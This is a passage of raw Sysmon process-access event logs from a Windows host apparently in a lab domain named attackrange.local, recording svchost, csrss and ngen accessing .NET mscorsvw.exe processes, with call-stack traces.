0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008193Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.259{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4659-6000-0E04-000000009A01}5056C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008192Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.244{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4659-6000-0E04-000000009A01}5056C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008191Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.244{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4659-6000-0E04-000000009A01}5056C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008190Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.181{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4659-6000-0D04-000000009A01}4760C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008189Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.165{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4659-6000-0D04-000000009A01}4760C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008188Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.165{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4659-6000-0D04-000000009A01}4760C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008187Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.103{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4659-6000-0C04-000000009A01}4252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008186Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.087{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4659-6000-0C04-000000009A01}4252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008185Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.087{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4659-6000-0C04-000000009A01}4252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008184Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.040{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4659-6000-0B04-000000009A01}4264C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008183Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.025{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4659-6000-0B04-000000009A01}4264C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008182Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.025{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4659-6000-0B04-000000009A01}4264C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008233Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:46.369{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465A-6000-1B04-000000009A01}3452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008232Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:46.353{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-465A-6000-1B04-000000009A01}3452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008231Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:46.353{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465A-6000-1B04-000000009A01}3452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008230Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:46.275{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465A-6000-1A04-000000009A01}2424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008229Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:46.259{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-465A-6000-1A04-000000009A01}2424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008228Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:46.259{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465A-6000-1A04-000000009A01}2424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008227Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:46.212{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465A-6000-1904-000000009A01}4632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008226Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:46.197{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-465A-6000-1904-000000009A01}4632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008225Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:46.197{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465A-6000-1904-000000009A01}4632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008224Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:46.166{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465A-6000-1804-000000009A01}2940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008223Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:46.150{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-465A-6000-1804-000000009A01}2940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008222Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 